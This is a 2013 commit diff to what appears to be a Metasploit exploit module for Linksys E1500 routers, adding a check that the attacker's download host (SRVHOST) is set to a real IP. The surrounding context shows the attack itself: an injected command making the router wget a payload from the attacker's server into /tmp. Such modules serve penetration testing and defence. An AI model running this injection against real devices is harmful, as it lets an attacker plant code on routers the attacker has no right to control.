check SRVHOST

m-1-k-3 · m-1-k-3 · commit c386d544453d · 2013-04-01T18:12:13.000+02:00
diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -161,6 +161,11 @@ def exploit
 				datastore['SSL'] = false
 			end
 
+			#we use SRVHOST as download IP for the coming wget command. 
+			#SRVHOST needs a real IP address of our download host
+			if datastore['SRVHOST'] =~ /0\.0\.0\.0/
+				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Configure SRVHOST to your local IP address.")
+			end
 			service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
 			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
 			start_service({'Uri' => {
@@ -179,6 +184,7 @@ def exploit
 		print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
 		#this filename is used to store the payload on the device
 		filename = rand_text_alpha_lower(8)
+
 		#not working if we send all command together -> lets take three requests
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
 		res = request(cmd,user,pass,uri)
